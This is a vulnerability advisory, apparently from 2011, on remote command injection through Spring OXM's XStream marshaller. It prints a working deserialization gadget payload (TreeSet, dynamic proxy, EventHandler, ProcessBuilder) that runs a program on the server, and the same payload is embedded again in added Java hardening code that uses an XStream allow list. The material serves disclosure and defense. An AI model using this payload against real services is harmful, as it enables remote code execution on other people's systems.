Computer Security
securityvulns.ru



From: pierre.ernst_(at)_ca.ibm.com <pierre.ernst_(at)_ca.ibm.com>
Date: 06.07.2011
Subject: Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used

Reference:
http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722

Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4, only when the XStream marshaller is used on an IBM JRE
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics

CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
 Access Vector: Network
 Access Complexity: High
 Authentication: None
 Confidentiality Impact: Complete
 Integrity Impact: Complete
 Availability Impact: Complete

Details:

Consider a service that accepts XML input and unmarshals it, through Spring OXM's XStream marshaller, into an instance of the Bicycle class.

This is an example of legitimate input:

<bicycle>
 <name>unicycle</name>
 <id>123</id>
 <nbrWheels>1</nbrWheels>
 <nbrRiders>1</nbrRiders>
</bicycle>


The following input instead executes notepad.exe on the server and opens the C:\Windows\win.ini file. The command is a harmless one chosen for demonstration; any program the service account can run works the same way.

XStream honours the class attribute on the root element, so the sender replaces Bicycle with java.util.TreeSet. The set is given a plain first element (<object />) and then a dynamic proxy implementing java.lang.Comparable, whose invocation handler is a java.beans.EventHandler whose target is a java.lang.ProcessBuilder holding the command. When XStream adds the proxy to the set, the resulting compareTo() call goes to the EventHandler, which forwards it to the ProcessBuilder's start() method, and the command runs during unmarshalling, before the application ever sees the result.

<bicycle class="java.util.TreeSet">
  <no-comparator />
  <object />
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string>notepad.exe</string>
          <string>c:\windows\win.ini</string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</bicycle>
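The hardening a practitioner would apply here, added as an example that is not part of the advisory, of Spring, or of XStream itself: the XStream instance that does the parsing is put into deny-all mode and given an allow list of exactly the types the service expects, using XStream's type-permission API (available in XStream 1.4.7 and later, which postdates this advisory). The Bicycle class below is an assumed reconstruction with one field per element of the legitimate sample, and the two XML strings are the advisory's own inputs embedded so the program runs offline. Fed the payload, XStream rejects java.util.TreeSet while resolving the root element's class attribute, before anything is instantiated, so ProcessBuilder.start() is never reached.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class BicycleUnmarshaller {

    // Assumed shape of the advisory's Bicycle class: one field per element of the
    // legitimate sample input.
    public static class Bicycle {
        String name;
        int id;
        int nbrWheels;
        int nbrRiders;
    }

    // The legitimate input from the advisory, embedded as a constant.
    static final String LEGIT_XML =
        "<bicycle>\n" +
        "  <name>unicycle</name>\n" +
        "  <id>123</id>\n" +
        "  <nbrWheels>1</nbrWheels>\n" +
        "  <nbrRiders>1</nbrRiders>\n" +
        "</bicycle>";

    // The advisory's payload. The class attribute on the root element is what lets the
    // sender choose java.util.TreeSet (and, further down, java.beans.EventHandler and
    // java.lang.ProcessBuilder) instead of Bicycle.
    static final String MALICIOUS_XML =
        "<bicycle class=\"java.util.TreeSet\">\n" +
        "  <no-comparator/>\n" +
        "  <object/>\n" +
        "  <dynamic-proxy>\n" +
        "    <interface>java.lang.Comparable</interface>\n" +
        "    <handler class=\"java.beans.EventHandler\">\n" +
        "      <target class=\"java.lang.ProcessBuilder\">\n" +
        "        <command>\n" +
        "          <string>notepad.exe</string>\n" +
        "          <string>c:\\windows\\win.ini</string>\n" +
        "        </command>\n" +
        "      </target>\n" +
        "      <action>start</action>\n" +
        "    </handler>\n" +
        "  </dynamic-proxy>\n" +
        "</bicycle>";

    // Build an XStream that can only produce the types this service expects:
    // deny everything first, then re-allow nulls, primitives, String and Bicycle.
    static XStream hardenedXStream() {
        XStream xs = new XStream();
        xs.alias("bicycle", Bicycle.class);
        xs.addPermission(NoTypePermission.NONE);
        xs.addPermission(NullPermission.NULL);
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xs.allowTypes(new Class[] { Bicycle.class, String.class });
        return xs;
    }

    // Unmarshal untrusted XML into a Bicycle. A class attribute naming a type outside
    // the allow list makes XStream throw (ForbiddenClassException, possibly wrapped in a
    // ConversionException for nested elements) while resolving the type name.
    static Bicycle unmarshalBicycle(String xml) {
        Object result = hardenedXStream().fromXML(xml);
        if (!(result instanceof Bicycle)) {
            throw new IllegalArgumentException("expected a bicycle, got " + result.getClass());
        }
        return (Bicycle) result;
    }

    public static void main(String[] args) {
        Bicycle b = unmarshalBicycle(LEGIT_XML);
        System.out.println("parsed: " + b.name + ", wheels=" + b.nbrWheels);

        try {
            unmarshalBicycle(MALICIOUS_XML);
            System.out.println("UNEXPECTED: payload was accepted");
        } catch (XStreamException e) {
            // Expected: java.util.TreeSet is not on the allow list, so the payload is
            // rejected here and ProcessBuilder.start() is never reached.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Run it with the XStream jar on the classpath. The allow list has to live on the XStream instance that reads the document, not in a type check on the returned object: the gadget fires while the input is being parsed, so anything that inspects the result runs too late. Later versions of Spring's XStreamMarshaller expose the same permission objects through a typePermissions property, which is the place to configure this when the marshaller is wired through Spring.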

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod